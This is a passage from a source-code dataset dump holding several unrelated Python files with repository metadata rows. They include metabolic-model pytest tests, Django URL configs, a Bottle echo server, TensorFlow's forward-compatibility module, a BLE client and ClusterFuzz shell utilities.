    ("transport_gpr", 0),
    ("ngam_and_atpsynthase", 0)
], indirect=["model"])
def test_find_constrained_transport_reactions(model, num):
    """Expect exactly `num` constrained transport reactions."""
    transporters = helpers.find_transport_reactions(model)
    constrained = {
        rxn for rxn in transporters
        if basic.is_constrained_reaction(model, rxn)}
    assert len(constrained) == num
@pytest.mark.parametrize("model, num", [
    ("reversible_oxygen_flow", 1),
    ("non_reversible_oxygen_flow", 0),
    ("transport_gpr", 0)
], indirect=["model"])
def test_find_reversible_oxygen_reactions(model, num):
    """Expect exactly `num` reversible oxygen-involving reactions."""
    oxygen_rxns = basic.find_oxygen_reactions(model)
    reversible = [rxn for rxn in oxygen_rxns if rxn.reversibility]
    assert len(reversible) == num
@pytest.mark.parametrize("model, num", [
    ("sufficient_compartments", 1)
], indirect=["model"])
def test_find_unique_metabolites(model, num):
    """Expect exactly `num` unique metabolites across compartments."""
    unique = basic.find_unique_metabolites(model)
    assert len(unique) == num
@pytest.mark.parametrize("model, num", [
    ("dup_mets_in_c", 1),
    ("dup_mets_in_c_wrong_annotation", 0),
    ("gpr_missing", 0)
], indirect=["model"])
def test_find_duplicate_metabolites_in_compartments(model, num):
    """Expect exactly `num` duplicated metabolites per compartment."""
    duplicates = basic.find_duplicate_metabolites_in_compartments(model)
    assert len(duplicates) == num
@pytest.mark.parametrize("model, num", [
    ("empty", 0),
    ("dup_rxns", 2),
    ("dup_rxns_multiple_anns", 2),
    ("dup_rxns_partial_matching_multiple_anns", 2),
    ("dup_rxns_list_anns", 2),
    ("dup_rxns_multiple_list_anns", 2),
    ("dup_rxns_no_matching_multiple_anns", 0),
    ("dup_rxns_multiple_list_anns_no_match", 0),
    ("dup_rxns_compartment", 2),
    ("dup_rxns_irrev", 2),
    ("gpr_missing", 0)
], indirect=["model"])
def test_find_reactions_with_partially_identical_annotations(model, num):
    """Expect exactly `num` reactions with (partially) shared annotations."""
    # Only the aggregate count is asserted; the grouping itself is ignored.
    duplicate_groups, total = \
        basic.find_reactions_with_partially_identical_annotations(model)
    assert total == num
@pytest.mark.parametrize("model, expected", [
    ("empty", 0),
    ("dup_rxns", 2),
    ("dup_rxns_rev", 0),
    ("dup_rxns_irrev", 0),
    ("dup_rxns_compartment", 0),
    ("dup_rxns_irrev_exchanges", 2),
], indirect=["model"])
def test_find_duplicate_reactions(model, expected):
    """Expect exactly `expected` duplicated reactions."""
    _, observed = basic.find_duplicate_reactions(model)
    assert observed == expected
@pytest.mark.parametrize("model, num", [
    ("empty", 0),
    ("identical_genes", 2),
    ("different_genes", 0),
    ("gpr_missing", 0)
], indirect=["model"])
def test_find_reactions_with_identical_genes(model, num):
    """Expect exactly `num` reactions sharing identical gene rules."""
    _, total = basic.find_reactions_with_identical_genes(model)
    assert total == num
@pytest.mark.parametrize("model, num", [
    ("transport_gpr", 1)
], indirect=["model"])
def test_check_transport_reaction_gpr_presence(model, num):
    """Expect exactly `num` transport reactions lacking a GPR."""
    without_gpr = basic.check_transport_reaction_gpr_presence(model)
    assert len(without_gpr) == num
@pytest.mark.parametrize("model, num", [
    ("rxns_with_two_substrates", 2),
    ("rxns_with_two_false_substrates", 0),
    ("rxns_no_exchange", 0),
], indirect=["model"])
def test_find_medium_metabolites(model, num):
    """Expect exactly `num` medium metabolites to be identified."""
    medium = basic.find_medium_metabolites(model)
    assert len(medium) == num
@pytest.mark.parametrize("model, num", [
    ("non_metabolic_reactions", 1),
    ("transport_gpr", 2),
    pytest.param("gpr_missing", 2,
                 marks=pytest.mark.raises(exception=RuntimeError)),
], indirect=["model"])
def test_find_external_metabolites(model, num):
    """Expect exactly `num` external metabolites to be found."""
    external = basic.find_external_metabolites(model)
    assert len(external) == num
| 36.319429 | 80 | 0.687128 |
ace8d311a66bd42c1fbc20003aba45d4e63db49e | 525 | py | Python | backend/backend/urls.py | kennyudekwu/dog-breed-classification | 51213ae2b15c4ec7b241c5c83ccd99bf82e7b612 | [
"MIT"
] | null | null | null | backend/backend/urls.py | kennyudekwu/dog-breed-classification | 51213ae2b15c4ec7b241c5c83ccd99bf82e7b612 | [
"MIT"
] | null | null | null | backend/backend/urls.py | kennyudekwu/dog-breed-classification | 51213ae2b15c4ec7b241c5c83ccd99bf82e7b612 | [
"MIT"
] | null | null | null | from django.conf.urls import url
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from api import views
# URL routing for the dog-breed-classification backend.
urlpatterns = [
    # path('predict', views.result, name="inferece"),
    path('admin/', admin.site.urls),
    path('frontend/', include('frontend.urls')),
    path('api/', include('api.urls'))
]

# Serve user-uploaded media through Django itself only in development.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL,
                          document_root=settings.MEDIA_ROOT)
| 30.882353 | 60 | 0.699048 |
ace8d326ec9119f03c25bcbf877267791bd2bcbe | 501 | py | Python | AlgorithmsPractice/otherQuestion/shopee/isPanlindrome.py | YangXiaoo/NoteBook | 37056acad7a05b876832f72ac34d3d1a41e0dd22 | [
"CNRI-Python",
"RSA-MD",
"CECILL-B"
] | 58 | 2019-03-03T04:42:23.000Z | 2022-01-13T04:36:31.000Z | AlgorithmsPractice/otherQuestion/shopee/isPanlindrome.py | YangXiaoo/NoteBook | 37056acad7a05b876832f72ac34d3d1a41e0dd22 | [
"CNRI-Python",
"RSA-MD",
"CECILL-B"
] | null | null | null | AlgorithmsPractice/otherQuestion/shopee/isPanlindrome.py | YangXiaoo/NoteBook | 37056acad7a05b876832f72ac34d3d1a41e0dd22 | [
"CNRI-Python",
"RSA-MD",
"CECILL-B"
] | 28 | 2019-08-11T01:25:00.000Z | 2021-08-22T06:46:06.000Z | import sys
def getox(num):
    """Return the hexadecimal digits of ``num``, least significant first.

    Args:
        num: A non-negative integer.

    Returns:
        A list of int digits (each 0-15) in little-endian order; ``[0]``
        when ``num`` is 0.

    Raises:
        ValueError: If ``num`` is negative (the original looped forever).
    """
    if num < 0:
        raise ValueError("num must be non-negative")
    if num == 0:
        return [0]
    digits = []
    while num:
        digits.append(num % 16)
        num //= 16
    return digits
def isPanlindrome(nums):
    """Return 1 if the sequence reads the same reversed, else 0.

    The misspelled name is kept as-is because it is the public interface.
    Replaces a mojibake (mis-encoded) docstring.
    """
    return 1 if nums == nums[::-1] else 0
def solver(num):
    """Entry point: return 1 if ``num``'s hexadecimal digit sequence is a
    palindrome, 0 otherwise.

    Replaces a mojibake (mis-encoded) docstring.
    """
    digits = getox(num)
    return isPanlindrome(digits)
def test():
    """Smoke-check the solver on a trivial single-digit input."""
    print(solver(1))
if __name__ == '__main__':
    test()  # Manual smoke test when run as a script.
| 13.916667 | 27 | 0.491018 |
ace8d414cf0d138c61ad46b23f549bc2edc4953f | 620 | py | Python | BeautyForMe/beautyforme/accounts/urls.py | YooInKeun/CAU_CSE_Capstone_3 | 51405c4bed2b55661aa0708c8acea17fe72aa701 | [
"MIT"
] | 6 | 2019-12-07T07:30:34.000Z | 2022-01-20T14:26:44.000Z | BeautyForMe/beautyforme/accounts/urls.py | YooInKeun/CAU_CSE_Capstone_3 | 51405c4bed2b55661aa0708c8acea17fe72aa701 | [
"MIT"
] | 9 | 2019-12-28T06:18:53.000Z | 2022-01-13T01:54:21.000Z | BeautyForMe/beautyforme/accounts/urls.py | YooInKeun/CAU_CSE_Capstone_3 | 51405c4bed2b55661aa0708c8acea17fe72aa701 | [
"MIT"
] | 1 | 2020-05-21T15:55:45.000Z | 2020-05-21T15:55:45.000Z | from django.urls import path, include
from django.contrib.auth import views as auth_views
from django.conf.urls import url
from . import views
app_name = 'accounts'
urlpatterns = [
path('login/', views.ConfirmIsValidUserView.as_view(), name='login'),
path('', include('django.contrib.auth.urls')),
path('signup/', views.CreateUserView.as_view(), name='signup'),
path('signup/done/', views.RegisteredView.as_view(), name='create_user_done'),
path('profile/', views.UserProfileView.as_view(), name='profile'),
path('profile/importance/', views.UserImportanceView.as_view(), name='importance'),
] | 38.75 | 87 | 0.722581 |
ace8d42f817e213d4f44bb8483178fb106e81829 | 1,557 | py | Python | ion/agents/platform/rsn/test/test_oms_client.py | ooici/coi-services | 43246f46a82e597345507afd7dfc7373cb346afa | [
"BSD-2-Clause"
] | 3 | 2016-09-20T09:50:06.000Z | 2018-08-10T01:41:38.000Z | ion/agents/platform/rsn/test/test_oms_client.py | ooici/coi-services | 43246f46a82e597345507afd7dfc7373cb346afa | [
"BSD-2-Clause"
] | null | null | null | ion/agents/platform/rsn/test/test_oms_client.py | ooici/coi-services | 43246f46a82e597345507afd7dfc7373cb346afa | [
"BSD-2-Clause"
] | 2 | 2016-03-16T22:25:49.000Z | 2016-11-26T14:54:21.000Z | #!/usr/bin/env python
"""
@package ion.agents.platform.rsn.test.test_oms_client
@file ion/agents/platform/rsn/test/test_oms_client.py
@author Carlos Rueda
@brief Test cases for CIOMSClient. The OMS enviroment variable can be used
to indicate which CIOMSClient will be tested.
"""
__author__ = 'Carlos Rueda'
from pyon.public import log
from ion.agents.platform.rsn.simulator.logger import Logger
Logger.set_logger(log)
from pyon.util.int_test import IonIntegrationTestCase
from ion.agents.platform.rsn.oms_client_factory import CIOMSClientFactory
from ion.agents.platform.rsn.test.oms_test_mixin import OmsTestMixin
from nose.plugins.attrib import attr
import os
@attr('INT', group='sa')
class Test(IonIntegrationTestCase, OmsTestMixin):
    """
    The OMS environment variable can be used to indicate which CIOMSClient
    will be tested. By default, it tests against the simulator, which is
    launched as an external process.
    """

    @classmethod
    def setUpClass(cls):
        OmsTestMixin.setUpClass()
        if cls.using_actual_rsn_oms_endpoint():
            # Use FQDN for local host if testing against the actual RSN OMS:
            cls._use_fqdn_for_event_listener = True

    def setUp(self):
        # OMS env var selects the client implementation; the default value
        # requests that the simulator be launched.
        oms_uri = os.getenv('OMS', "launchsimulator")
        oms_uri = self._dispatch_simulator(oms_uri)
        log.debug("oms_uri = %s", oms_uri)
        self.oms = CIOMSClientFactory.create_instance(oms_uri)

        def done():
            # Tear down the client created above once the test finishes.
            CIOMSClientFactory.destroy_instance(self.oms)

        self.addCleanup(done)
| 29.377358 | 78 | 0.725112 |
ace8d4583473ec06450cfefaa049eddbabf43625 | 719 | py | Python | testserver.py | shearichard/behave-web-api | b71d62f40ff53332af640f964c57a11fb7c5d668 | [
"MIT"
] | 3 | 2016-03-12T23:31:20.000Z | 2016-03-19T23:24:30.000Z | testserver.py | shearichard/behave-web-api | b71d62f40ff53332af640f964c57a11fb7c5d668 | [
"MIT"
] | 4 | 2017-01-27T15:21:18.000Z | 2021-08-19T12:09:03.000Z | testserver.py | shearichard/behave-web-api | b71d62f40ff53332af640f964c57a11fb7c5d668 | [
"MIT"
] | 3 | 2017-01-18T15:42:08.000Z | 2021-08-18T09:20:04.000Z | import json
from bottle import Bottle, run, request
app = Bottle()
@app.route('/requests/echo', method='ANY')
def echo():
    """Echo back the request's method, headers, body and uploaded files.

    The body is JSON-decoded when the Content-Type header says so; on any
    decode failure the raw string (or None) is returned unchanged.
    """
    try:
        body = request.body.read().decode('utf-8')
    except Exception:
        # Narrowed from a bare `except:`; keep the best-effort behaviour of
        # echoing None when the body cannot be read/decoded.
        body = None

    print(request.headers['Content-Type'])
    if request.headers['Content-Type'] == 'application/json':
        try:
            body = json.loads(body)
        except Exception:
            # Non-JSON payload despite the header: fall back to the raw body.
            pass

    result = {
        'method': request.method,
        'headers': dict(request.headers),
        'body': body,
        'files': [
            {'key': key, 'name': request.files[key].raw_filename}
            for key in request.files
        ]
    }

    return result
# Serve the echo endpoint for the test suite on localhost:5000.
run(app, host='localhost', port='5000')
| 19.972222 | 65 | 0.547983 |
ace8d488459b32ae1c2fe216accbbd1dce30d390 | 288 | py | Python | scripts/animation.py | brickbitbot/cheatsheets | c3b4509bf76fc180621ca1e6433d42742a656759 | [
"BSD-2-Clause"
] | 2 | 2021-08-04T09:01:15.000Z | 2021-08-04T18:54:19.000Z | scripts/animation.py | tamtridung/cheatsheets | 2e1d87bd3d03497b335ba5f936102a9fb5e7afac | [
"BSD-2-Clause"
] | 2 | 2021-05-05T01:05:10.000Z | 2021-05-05T01:05:32.000Z | scripts/animation.py | tamtridung/cheatsheets | 2e1d87bd3d03497b335ba5f936102a9fb5e7afac | [
"BSD-2-Clause"
] | 1 | 2022-01-20T12:42:22.000Z | 2022-01-20T12:42:22.000Z | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
# 100 sample points over one full period [0, 2*pi].
T = np.linspace(0,2*np.pi,100)
S = np.sin(T)
line, = plt.plot(T, S)


def animate(i):
    # Frame i shifts the sine wave by i/50 radians; the Line2D is updated
    # in place instead of redrawing the whole plot.
    line.set_ydata(np.sin(T+i/50))


# interval is in milliseconds per Matplotlib's FuncAnimation API.
a=animation.FuncAnimation(
    plt.gcf(), animate, interval=5)
| 22.153846 | 40 | 0.704861 |
ace8d5125f76ec27f4ad14ee3b31ff8b79afed08 | 150 | py | Python | tests/model_control/detailed/transf_Logit/model_control_one_enabled_Logit_Lag1Trend_NoCycle_AR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | null | null | null | tests/model_control/detailed/transf_Logit/model_control_one_enabled_Logit_Lag1Trend_NoCycle_AR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | 1 | 2019-11-30T23:39:38.000Z | 2019-12-01T04:34:35.000Z | tests/model_control/detailed/transf_Logit/model_control_one_enabled_Logit_Lag1Trend_NoCycle_AR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | null | null | null | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Logit'] , ['Lag1Trend'] , ['NoCycle'] , ['AR'] ); | 37.5 | 75 | 0.733333 |
ace8d53680ce69fcdfe588ba101ea6f14b00a73d | 510 | py | Python | source/build/turtlebot_pkg/catkin_generated/pkg.develspace.context.pc.py | royeom/Turtlebot_Autorace | 15615b71f6b190e89efd9c9672f1c95d2f598c64 | [
"BSD-3-Clause"
] | null | null | null | source/build/turtlebot_pkg/catkin_generated/pkg.develspace.context.pc.py | royeom/Turtlebot_Autorace | 15615b71f6b190e89efd9c9672f1c95d2f598c64 | [
"BSD-3-Clause"
] | null | null | null | source/build/turtlebot_pkg/catkin_generated/pkg.develspace.context.pc.py | royeom/Turtlebot_Autorace | 15615b71f6b190e89efd9c9672f1c95d2f598c64 | [
"BSD-3-Clause"
] | null | null | null | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/bonobono/catkin_ws/devel/include".split(';') if "/home/bonobono/catkin_ws/devel/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;std_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-loroca_ros_tutorials".split(';') if "-loroca_ros_tutorials" != "" else []
PROJECT_NAME = "turtlebot_pkg"
PROJECT_SPACE_DIR = "/home/bonobono/catkin_ws/devel"
PROJECT_VERSION = "0.0.0"
| 56.666667 | 143 | 0.758824 |
ace8d632a8998c200d36aebb61f7a1f580e6ac99 | 894 | py | Python | tests/libs/pagerduty/pagerduty_tests.py | pythonghana/gatekeeper-service | e609e375f9cf80a1bc721c8b314c3b1c47831ad0 | [
"Apache-2.0"
] | 28 | 2018-06-22T17:43:40.000Z | 2022-03-11T03:10:20.000Z | tests/libs/pagerduty/pagerduty_tests.py | pythonghana/gatekeeper-service | e609e375f9cf80a1bc721c8b314c3b1c47831ad0 | [
"Apache-2.0"
] | 1 | 2022-03-21T00:59:32.000Z | 2022-03-21T00:59:32.000Z | tests/libs/pagerduty/pagerduty_tests.py | pythonghana/gatekeeper-service | e609e375f9cf80a1bc721c8b314c3b1c47831ad0 | [
"Apache-2.0"
] | 7 | 2018-06-22T18:02:37.000Z | 2022-03-21T00:59:21.000Z | import json
from unittest import TestCase
import os
from pagerduty import PagerDutyApi
from mock import patch, MagicMock
CALL_PAGERDUTY_API = "pagerduty.HttpController.api_request"
class PagerDutyApiTests(TestCase):
def read_resource_file(self, res_file):
mock_results_dir = "tests/libs/pagerduty/mock_results"
try:
mock_resource_file = os.path.join(mock_results_dir, res_file)
with open(mock_resource_file, "r") as fp:
self.mock_resource = json.loads(fp.read())
fp.close()
except IOError:
self.mock_resource = None
return self.mock_resource
@patch(CALL_PAGERDUTY_API)
def test_delete_user_pass(self, mock_pagerduty_api):
mock_pagerduty_api.return_value = ""
pagerduty_admin = PagerDutyApi(use_proxy=False, config=MagicMock())
delete_user = pagerduty_admin.delete_user(user_id="PP7WT8E")
assert delete_user == ""
| 27.090909 | 71 | 0.748322 |
ace8d6934e31b34aecd0fe8d90f4d17688cecc59 | 5,877 | py | Python | tensorflow/python/compat/compat.py | buchgr/tensorflow | 2938772a08ed02ced4663ca38168ab3f82e8f81b | [
"Apache-2.0"
] | null | null | null | tensorflow/python/compat/compat.py | buchgr/tensorflow | 2938772a08ed02ced4663ca38168ab3f82e8f81b | [
"Apache-2.0"
] | 2 | 2021-08-25T15:57:54.000Z | 2022-02-10T01:14:29.000Z | tensorflow/python/compat/compat.py | buchgr/tensorflow | 2938772a08ed02ced4663ca38168ab3f82e8f81b | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for API compatibility between TensorFlow release versions.
See [Version
Compatibility](https://tensorflow.org/guide/version_compat#backward_forward)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util.tf_export import tf_export
# This value changes every day with an automatic CL. It can be modified in code
# via `forward_compatibility_horizon()` or with the environment variable
# TF_FORWARD_COMPATIBILITY_DELTA_DAYS, which is added to the compatibility date.
_FORWARD_COMPATIBILITY_HORIZON = datetime.date(2020, 1, 27)
_FORWARD_COMPATIBILITY_DELTA_DAYS_VAR_NAME = "TF_FORWARD_COMPATIBILITY_DELTA_DAYS"
# Packed-date cache; None only until the module-level initialization call
# (`_update_forward_compatibility_date_number()`) fills it at import time.
_FORWARD_COMPATIBILITY_DATE_NUMBER = None
def _date_to_date_number(year, month, day):
return (year << 9) | (month << 5) | day
def _update_forward_compatibility_date_number(date_to_override=None):
  """Recompute the cached date number used by `forward_compatible`."""
  global _FORWARD_COMPATIBILITY_DATE_NUMBER

  effective = date_to_override or _FORWARD_COMPATIBILITY_HORIZON
  if not date_to_override:
    # The environment delta only applies to the default horizon, never to an
    # explicit override.
    delta = os.getenv(_FORWARD_COMPATIBILITY_DELTA_DAYS_VAR_NAME)
    if delta:
      effective += datetime.timedelta(days=int(delta))

  _FORWARD_COMPATIBILITY_DATE_NUMBER = _date_to_date_number(
      effective.year, effective.month, effective.day)
# Populate _FORWARD_COMPATIBILITY_DATE_NUMBER once at import time.
_update_forward_compatibility_date_number()
@tf_export("compat.forward_compatible")
def forward_compatible(year, month, day):
  """Return true if the forward compatibility window has expired.

  See [Version
  compatibility](https://tensorflow.org/guide/version_compat#backward_forward).

  Forward compatibility covers the case where the producer of a TensorFlow
  model (a GraphDef or SavedModel) is compiled against a newer TensorFlow
  library than the consumer that later loads and serves the model.
  TensorFlow supports a 3-week forward-compatibility window for programs
  compiled from source at HEAD, so a Python wrapper can gate a replacement
  op like this:

  ```python
  from tensorflow.python.compat import compat

  def add(inputs, name=None):
    if compat.forward_compatible(year, month, day):
      # Can use the awesome new implementation.
      return gen_math_ops.my_new_awesome_add(inputs, name)
    # To maintain forward compatibiltiy, use the old implementation.
    return gen_math_ops.add(inputs, name)
  ```

  `year`, `month` and `day` name the date beyond which consuming binaries
  are expected to include the new operation — typically at least 3 weeks
  after the commit that introduces it.

  Args:
    year: A year (e.g., 2018). Must be an `int`.
    month: A month (1 <= month <= 12) in year. Must be an `int`.
    day: A day (1 <= day <= 31, or 30, or 29, or 28) in month. Must be an
      `int`.

  Returns:
    True if serialized TensorFlow graphs produced by the caller can be
    consumed by programs compiled from source after (year, month, day).
  """
  requested = _date_to_date_number(year, month, day)
  return _FORWARD_COMPATIBILITY_DATE_NUMBER > requested
@tf_export("compat.forward_compatibility_horizon")
@tf_contextlib.contextmanager
def forward_compatibility_horizon(year, month, day):
  """Context manager for testing forward compatibility of generated graphs.

  See [Version
  compatibility](https://tensorflow.org/guide/version_compat#backward_forward).

  Temporarily moves the compatibility horizon so that code gated with
  `forward_compatible(...)` can be unit-tested before the real window
  expires:

  ```python
  from tensorflow.python.compat import compat

  def testMyNewFeature(self):
    with compat.forward_compatibility_horizon(2018, 08, 02):
       # Test that generate_graph_with_new_features() has an effect
  ```

  Args:
    year: A year (e.g., 2018). Must be an `int`.
    month: A month (1 <= month <= 12) in year. Must be an `int`.
    day: A day (1 <= day <= 31, or 30, or 29, or 28) in month. Must be an
      `int`.

  Yields:
    Nothing.
  """
  override = datetime.date(year, month, day)
  try:
    _update_forward_compatibility_date_number(override)
    yield
  finally:
    # Restore the default horizon regardless of what the body did.
    _update_forward_compatibility_date_number()
| 35.191617 | 82 | 0.74766 |
ace8d6baa6683578e1186a6d912bf29d087a0fd9 | 822 | py | Python | Templates_I/Templates_I/urls.py | BrianMarquez3/Python-Django | 61f84a01b7f57254f9dcbbad86cc4c88c2acf4d7 | [
"MIT"
] | 2 | 2020-09-28T21:23:59.000Z | 2021-11-10T15:01:15.000Z | Templates_I/Templates_I/urls.py | BrianMarquez3/Python-Django | 61f84a01b7f57254f9dcbbad86cc4c88c2acf4d7 | [
"MIT"
] | 21 | 2021-02-04T01:37:44.000Z | 2022-03-12T01:00:55.000Z | Templates_I/Templates_I/urls.py | BrianMarquez3/Python-Django | 61f84a01b7f57254f9dcbbad86cc4c88c2acf4d7 | [
"MIT"
] | null | null | null | """ORM_II URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from core.erp.views import myfirstView
# Route table: Django admin plus a single demo view.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('prueba/', myfirstView),
]
| 32.88 | 77 | 0.710462 |
ace8d76a46cc7e4e07c5d7f3a8b9a7671ded3802 | 2,092 | py | Python | adaptiveleak/device/energy_client.py | tejaskannan/adaptive-sensor-security | 4c6dd1eb55eb30a8330c4bf3537e06c7d7802c0b | [
"Apache-2.0"
] | null | null | null | adaptiveleak/device/energy_client.py | tejaskannan/adaptive-sensor-security | 4c6dd1eb55eb30a8330c4bf3537e06c7d7802c0b | [
"Apache-2.0"
] | null | null | null | adaptiveleak/device/energy_client.py | tejaskannan/adaptive-sensor-security | 4c6dd1eb55eb30a8330c4bf3537e06c7d7802c0b | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
import sys
import time
from argparse import ArgumentParser
from functools import reduce
from typing import Optional, Iterable, List
from ble_manager import BLEManager
# BLE endpoint of the device under test (see BLEManager usage below).
MAC_ADDRESS = '00:35:FF:13:A3:1E'
BLE_HANDLE = 18
HCI_DEVICE = 'hci0'
# Seconds to pause between trials.
SLEEP = 2
# Payload sizes (bytes) the device can serve; `execute_client` sends the
# index of the requested size rather than the size itself.
sizes = [20, 40, 80, 120, 160, 200, 240, 280, 320, 360, 400, 440, 480, 520, 560, 600, 640, 680, 33, 479, 675, 886, 970]
def execute_client(num_bytes: int, num_trials: int):
    """
    Starts the device client. This function connects with the device (to
    reset the sleep mode), and then receives a single message per trial.

    Args:
        num_bytes: The number of bytes to receive; must be one of ``sizes``.
        num_trials: Number of query/response rounds to run.
    """
    assert num_bytes >= 1, 'Must provide a positive number of bytes'

    # Raises ValueError if num_bytes is not a known payload size.
    byte_index = sizes.index(num_bytes)

    # Initialize the device manager
    device_manager = BLEManager(mac_addr=MAC_ADDRESS, handle=BLE_HANDLE, hci_device=HCI_DEVICE)

    print('==========')
    print('Starting experiment')
    print('==========')

    # Start and reset the device
    try:
        device_manager.start()
        #device_manager.send_and_expect_byte(value=b'\xab', expected='\xcd')
    finally:
        device_manager.stop()

    print('Press any key to start...')
    x = input()

    for _ in range(num_trials):
        try:
            device_manager.start()

            # NOTE(review): the +10 offset on the size index appears to be a
            # firmware convention — confirm against the device code.
            size_index = (byte_index + 10).to_bytes(1, 'little')
            response = device_manager.query(value=size_index)

            #device_manager.send(value=b'\xab')
            #data = num_bytes.to_bytes(2, 'big')
            #response = device_manager.query(value=data)

            print('Received response of {0} bytes (Target: {1})'.format(len(response), num_bytes))
        finally:
            # Always release the BLE connection, even on a failed query.
            device_manager.stop()

        time.sleep(SLEEP)
if __name__ == '__main__':
    # CLI entry point: payload size per response and number of rounds.
    parser = ArgumentParser()
    parser.add_argument('--num-bytes', type=int, required=True)
    parser.add_argument('--num-trials', type=int, required=True)
    args = parser.parse_args()

    execute_client(num_bytes=args.num_bytes, num_trials=args.num_trials)
| 29.055556 | 119 | 0.657266 |
ace8d7f2df31aa1cf437b40e7a9fa7b7e672fd73 | 18,300 | py | Python | src/python/system/shell.py | phwd/clusterfuzz | 420ef737056165184c165f81487212d2e752a71e | [
"Apache-2.0"
] | null | null | null | src/python/system/shell.py | phwd/clusterfuzz | 420ef737056165184c165f81487212d2e752a71e | [
"Apache-2.0"
] | null | null | null | src/python/system/shell.py | phwd/clusterfuzz | 420ef737056165184c165f81487212d2e752a71e | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shell related functions."""
from builtins import str
import os
import re
import shlex
import shutil
import subprocess
import sys
import tempfile
from base import persistent_cache
from metrics import logs
from system import environment
try:
import psutil
except ImportError:
psutil = None
_DEFAULT_LOW_DISK_SPACE_THRESHOLD = 5 * 1024 * 1024 * 1024 # 5 GB.
_TRUSTED_HOST_LOW_DISK_SPACE_THRESHOLD = 2 * 1024 * 1024 # 2 GB.
FILE_COPY_BUFFER_SIZE = 10 * 1024 * 1024 # 10 MB.
HANDLE_OUTPUT_FILE_TYPE_REGEX = re.compile(
br'.*pid:\s*(\d+)\s*type:\s*File\s*([a-fA-F0-9]+):\s*(.*)')
_system_temp_dir = None
def _low_disk_space_threshold():
  """Get the low disk space threshold."""
  # Trusted hosts can run with less free space as they do not store builds
  # or corpora.
  is_trusted = environment.is_trusted_host(ensure_connected=False)
  return (_TRUSTED_HOST_LOW_DISK_SPACE_THRESHOLD
          if is_trusted else _DEFAULT_LOW_DISK_SPACE_THRESHOLD)
def copy_file(source_file_path, destination_file_path):
  """Faster version of shutil.copy with buffer size.

  Returns True if the destination file exists after a clean copy, False
  otherwise (missing source, or any error during the copy)."""
  if not os.path.exists(source_file_path):
    logs.log_error('Source file %s for copy not found.' % source_file_path)
    return False

  copy_failed = False
  try:
    with open(source_file_path, 'rb') as source_handle:
      with open(destination_file_path, 'wb') as destination_handle:
        shutil.copyfileobj(source_handle, destination_handle,
                           FILE_COPY_BUFFER_SIZE)
  except:
    copy_failed = True

  # The copy only counts as successful if the destination materialized.
  if copy_failed or not os.path.exists(destination_file_path):
    logs.log_warn('Failed to copy source file %s to destination file %s.' %
                  (source_file_path, destination_file_path))
    return False

  return True
def clear_build_directory():
  """Clears the build directory."""
  builds_directory = environment.get_value('BUILDS_DIR')
  remove_directory(builds_directory, recreate=True)
def clear_build_urls_directory():
  """Clears the build url directory."""
  remove_directory(environment.get_value('BUILD_URLS_DIR'), recreate=True)

  # On a trusted host, mirror the cleanup on the untrusted worker as well.
  if not environment.is_trusted_host():
    return
  from bot.untrusted_runner import file_host
  file_host.clear_build_urls_directory()
def clear_crash_stacktraces_directory():
  """Clears the crash stacktraces directory."""
  stacktraces_directory = environment.get_value('CRASH_STACKTRACES_DIR')
  remove_directory(stacktraces_directory, recreate=True)
def clear_common_data_bundles_directory():
  """Clear the common data bundle directory."""
  fuzz_data_directory = environment.get_value('FUZZ_DATA')
  remove_directory(fuzz_data_directory, recreate=True)
def clear_data_bundles_directory():
  """Clears the data bundles directory."""
  bundles_directory = environment.get_value('DATA_BUNDLES_DIR')
  remove_directory(bundles_directory, recreate=True)
def clear_mutator_plugins_directory():
  """Clears the mutator plugins directory."""
  plugins_directory = environment.get_value('MUTATOR_PLUGINS_DIR')
  remove_directory(plugins_directory, recreate=True)
def clear_data_directories():
  """Clear all data directories."""
  # Each helper below removes and recreates one bot-managed directory.
  clear_build_directory()
  clear_build_urls_directory()
  clear_crash_stacktraces_directory()
  clear_common_data_bundles_directory()
  clear_data_bundles_directory()
  clear_fuzzers_directories()
  clear_temp_directory()
  clear_testcase_directories()
  clear_mutator_plugins_directory()
  # Also drop all persisted key/value cache state.
  persistent_cache.clear_values(clear_all=True)
def clear_data_directories_on_low_disk_space():
